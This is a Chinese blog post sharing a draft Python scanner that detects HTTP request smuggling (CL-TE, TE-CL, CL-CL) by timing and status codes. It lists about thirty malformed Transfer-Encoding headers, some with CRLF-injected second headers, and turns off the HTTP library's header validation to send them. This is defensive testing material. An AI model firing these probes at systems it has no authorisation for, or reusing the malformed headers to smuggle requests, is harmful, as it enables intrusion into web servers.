其他分享
首页 > 其他分享 > http-smuggling

http-smuggling

作者:互联网

前言

本来想写成:获取参数、启动nmap扫描端口,再对所有识别出的HTTP端口进行测试。后来偷懒,改写成了pocsuite3的插件。
项目地址

原理与攻击面

协议层的攻击——HTTP请求走私
一篇文章带你读懂http请求走私
seebug这篇中提到的几篇blackhat议题建议都看看

检测脚本-草稿

freebuf上的一篇检测脚本实现
nmap扫描端口,识别http服务还没写完
命令行运行,接受参数部分也没写完

# -*- coding:utf-8 -*-
from libnmap import process
from libnmap import parser
import requests
import time
import urllib3
import http
import argparse
import collections


# `import http` alone does not load the `http.client` submodule; import it
# explicitly so the patches below do not depend on another library having
# imported it first.
import http.client

# Disable http.client's header name/value validation so that deliberately
# malformed headers (embedded spaces, CR/LF, control characters) can be sent.
http.client._is_legal_header_name = lambda x: True
http.client._is_illegal_header_value = lambda x: False
# Silence urllib3's warnings; requests in this script are sent with
# verify=False, which would otherwise warn on every HTTPS request.
urllib3.disable_warnings()


def get_opt(argv=None):
    """
    Parse the command-line options of the scanner.

    :param argv: optional list of argument strings; when None (the default)
                 argparse reads them from sys.argv[1:]
    :return: argparse.Namespace with ``url`` (str or None) and ``sig`` (bool)
    """
    # NOTE: the usage text also advertises -n and -f, which are not registered
    # below yet (argument handling is still unfinished in this draft).
    usage = "-u <a target url>\n -n <target network segment>\n -f <targets url file>\n -s <enable multiprocess>\n"
    opt_parser = argparse.ArgumentParser(usage=usage, epilog="written by wuerror")
    opt_parser.add_argument('-u', type=str, nargs='?', dest='url', help="input a single target url")
    # "store_true" (previously misspelled) makes -s a boolean flag defaulting to False
    opt_parser.add_argument('-s', action="store_true", dest='sig', help="a signal for start multiprocess")
    return opt_parser.parse_args(argv)


def nmap_scan(target):
    """
    Run an ``nmap -sV`` scan against *target* and print what it finds.

    Progress is printed every two seconds while the scan runs in the
    background. If nmap exits with return code 0, every parsed host and its
    service list are printed. HTTP/HTTPS services are recognised but nothing
    is done with them yet (unfinished placeholder).
    """
    scanner = process.NmapProcess(target, options="-sV")
    scanner.run_background()

    # Poll until the background scan finishes
    while scanner.is_running():
        status = "Nmap Scan running: ETC: {0} DONE: {1}%".format(scanner.etc, scanner.progress)
        print(status)
        time.sleep(2)

    # Nothing to report when nmap did not exit cleanly
    if scanner.rc != 0:
        return

    report = parser.NmapParser.parse(scanner.stdout)
    for host in report.hosts:
        print(host)
        print(host.services)
        for svc in host.services:
            if svc.service in ("http", "https"):
                # placeholder: web services are not processed yet
                pass


class Smuggler():
    """
    Detector for HTTP request smuggling (CL-TE, TE-CL and CL-CL).

    Typical use: ``malform()`` -> ``make_headers()`` -> ``run(url)``.
    CL-TE / TE-CL are detected by response delay, CL-CL by status code.
    """

    # Seconds to wait for a response; a read timeout is reported as this delay.
    TIMEOUT = 10
    # A probe must take longer than this many seconds ...
    DELAY_SECONDS = 5
    # ... and at least this many times longer than the baseline request.
    DELAY_RATIO = 5
    # Code points swapped in for a leading space: HT, VT, FF, CR
    _WHITESPACE_CODES = (9, 11, 12, 13)
    # Headers appended after the header under test in every request
    _COMMON_HEADERS = (
        ('Cache-Control', "no-cache"),
        ('Content-Type', "application/x-www-form-urlencoded"),
        ('User-Agent', "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"),
    )

    def __init__(self):
        # headers of the request that triggered a detection, kept for manual re-check
        self.recheck_headers = None
        # complete header sets, filled by make_headers()
        self.payload_headers = []
        # malformed te headers, filled by malform()
        self.te_headers = []
        self.Transfer_Encoding = [["Transfer-Encoding", "chunked"],
                                   ["Transfer-Encoding ", "chunked"],
                                   ["Transfer_Encoding", "chunked"],
                                   ["Transfer Encoding", "chunked"],
                                   [" Transfer-Encoding", "chunked"],
                                   ["Transfer-Encoding", "  chunked"],
                                   ["Transfer-Encoding", "chunked"],
                                   ["Transfer-Encoding", "\tchunked"],
                                   ["Transfer-Encoding", "\u000Bchunked"],
                                   ["Content-Encoding", " chunked"],
                                   ["Transfer-Encoding", "\n chunked"],
                                   ["Transfer-Encoding\n ", " chunked"],
                                   ["Transfer-Encoding", " \"chunked\""],
                                   ["Transfer-Encoding", " 'chunked'"],
                                   ["Transfer-Encoding", " \n\u000Bchunked"],
                                   ["Transfer-Encoding", " \n\tchunked"],
                                   ["Transfer-Encoding", " chunked, cow"],
                                   ["Transfer-Encoding", " cow, "],
                                   ["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
                                   ["Transfer-Encoding", " chunk"],
                                   ["Transfer-Encoding", " cHuNkeD"],
                                   ["TrAnSFer-EnCODinG", " cHuNkeD"],
                                   ["Transfer-Encoding", " CHUNKED"],
                                   ["TRANSFER-ENCODING", " CHUNKED"],
                                   ["Transfer-Encoding", " chunked\r"],
                                   ["Transfer-Encoding", " chunked\t"],
                                   ["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
                                   ["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
                                   ["Transfer\r-Encoding", " chunked"],
                                   ["barn\n\nTransfer-Encoding", " chunked"],
                                   ]

    def _build_headers(self, name, value):
        """
        Return an ordered header set: the header under test, then the common headers.
        """
        headers = collections.OrderedDict()
        headers[name] = value
        for key, val in self._COMMON_HEADERS:
            headers[key] = val
        return headers

    def malform(self):
        """
        Build the malformed Transfer-Encoding header list in ``self.te_headers``.

        The result is every base entry of ``self.Transfer_Encoding`` followed
        by, for each entry whose value starts with a space, four variants in
        which that space is replaced by HT, VT, FF and CR.
        """
        # Work on a copy: the base list must not grow while it is being
        # iterated, and repeated calls must not pile up duplicate variants.
        self.te_headers = [list(pair) for pair in self.Transfer_Encoding]
        for name, value in self.Transfer_Encoding:
            if value.startswith(" "):
                for code in self._WHITESPACE_CODES:
                    self.te_headers.append([name, chr(code) + value[1:]])

    def make_headers(self):
        """
        Build one complete header set per entry of ``self.te_headers``.

        ``self.payload_headers`` is rebuilt from scratch on every call.
        """
        self.payload_headers = [self._build_headers(name, value)
                                for name, value in self.te_headers]

    def send_payload(self, url, headers=None, payload=""):
        """
        Send a detection request through a requests prepared request.

        :param url: target url
        :param headers: HTTP headers; they replace the prepared headers entirely
        :param payload: HTTP body
        :return resp_time: response delay in seconds, ``TIMEOUT`` on a read
                           timeout, or None when the connection failed
        """
        prepped = requests.Request('POST', url, data=payload).prepare()
        # Overwrite the headers requests generated so the request carries
        # exactly the (possibly malformed) headers supplied by the caller.
        prepped.headers = {} if headers is None else headers
        try:
            # The context manager closes the session's connections afterwards
            with requests.Session() as s:
                resp = s.send(prepped, verify=False, timeout=self.TIMEOUT)
        except requests.exceptions.ReadTimeout as e:
            print(e.args)
            return self.TIMEOUT
        except requests.exceptions.ConnectionError as ex:
            print(ex.args)
            print("failed to connect")
            return None
        return resp.elapsed.total_seconds()

    def _timing_detect(self, url, probe, baseline):
        """
        Run a delay-based check with every header set in ``self.payload_headers``.

        :param url: target url
        :param probe: (content_length, body) of the request expected to stall
        :param baseline: (content_length, body) of the comparison request
        :return: True as soon as one header set yields a probe delay above
                 ``DELAY_SECONDS`` that is also at least ``DELAY_RATIO`` times
                 the baseline delay; False otherwise
        """
        for headers in self.payload_headers:
            # Content-Length is rewritten in place on the shared header set
            headers['Content-Length'] = str(probe[0])
            delayed = self.send_payload(url, headers, probe[1])
            # A failed connection or a fast answer means no stall: next variant
            if delayed is None or delayed < self.DELAY_SECONDS:
                continue

            # baseline request
            headers['Content-Length'] = str(baseline[0])
            normal = self.send_payload(url, headers, baseline[1])
            if normal is None:
                normal = 1

            print(normal, delayed)
            # Multiplying instead of dividing avoids a ZeroDivisionError
            # when the baseline delay is reported as 0.
            if delayed > self.DELAY_SECONDS and delayed >= self.DELAY_RATIO * normal:
                self.recheck_headers = [headers]
                return True
        return False

    def check_clte(self, url):
        """
        Check for a CL-TE type smuggling vulnerability.

        :param url: target url
        :return: True if a delay was detected, otherwise False
        """
        body = "1\r\nZ\r\nQ\r\n\r\n\r\n"
        return self._timing_detect(url, (4, body), (11, body))

    def check_tecl(self, url):
        """
        Check for a TE-CL type smuggling vulnerability.

        :param url: target url
        :return: True if a delay was detected, otherwise False
        """
        return self._timing_detect(url, (6, "0\r\n\r\nX"), (5, "0\r\n\r\n"))

    def send_cl_payload(self, url, header, payload):
        """
        Send a CL-CL detection request.

        :param url: target url
        :param header: HTTP headers; they replace the prepared headers entirely
        :param payload: HTTP body
        :return: False when the server answers 400 or the request fails,
                 True for any other status code
        """
        prepped = requests.Request('POST', url, data=payload).prepare()
        prepped.headers = header
        try:
            with requests.Session() as sess:
                resp = sess.send(prepped, verify=False, timeout=self.TIMEOUT)
        except requests.exceptions.RequestException as e:
            print(e.args)
            return False
        return resp.status_code != 400

    def check_clcl(self, url):
        """
        Check for a CL-CL type vulnerability (RFC 7230 section 3.3.3).

        Sends requests carrying two conflicting Content-Length values, with
        the space after the first header name replaced by HT, VT, FF and CR
        in turn. A server that does not answer 400 is reported as affected.

        :param url: target url
        :return: True on the first variant that is accepted, otherwise False
        """
        name, value = "Content-Length", " 8\r\nContent-Length: 5"
        for code in self._WHITESPACE_CODES:
            headers = self._build_headers(name, chr(code) + value[1:])
            if self.send_cl_payload(url, headers, "0\r\n\r\n"):
                print("clcl detect")
                self.recheck_headers = [headers]
                return True
        return False

    def run(self, url):
        """
        Entry point: run the CL-TE, TE-CL and CL-CL checks in that order and
        print the first finding. Any exception is printed, not raised.
        """
        try:
            if self.check_clte(url):
                print("vuln detect: CL-TE")
            elif self.check_tecl(url):
                print("vuln detect:TE-CL")
            elif self.check_clcl(url):
                print("vuln detect:CL-CL")
            else:
                print("not detect")
        except Exception as e:
            # top-level boundary of the scan: report and keep the script alive
            print(e.args)


if __name__ == "__main__":
    # The target URL is left blank in this draft; fill it in before running.
    url = ''
    detector = Smuggler()
    # Expand the malformed Transfer-Encoding variants, then build the
    # complete header set for each of them before starting the checks.
    detector.malform()
    detector.make_headers()
    detector.run(url)

最后

我感觉这漏洞想利用也蛮难的,不是一个exp就能搞定的

标签:http,Encoding,Transfer,smuggling,payload,headers,chunked,self
来源: https://www.cnblogs.com/wuerror/p/14508875.html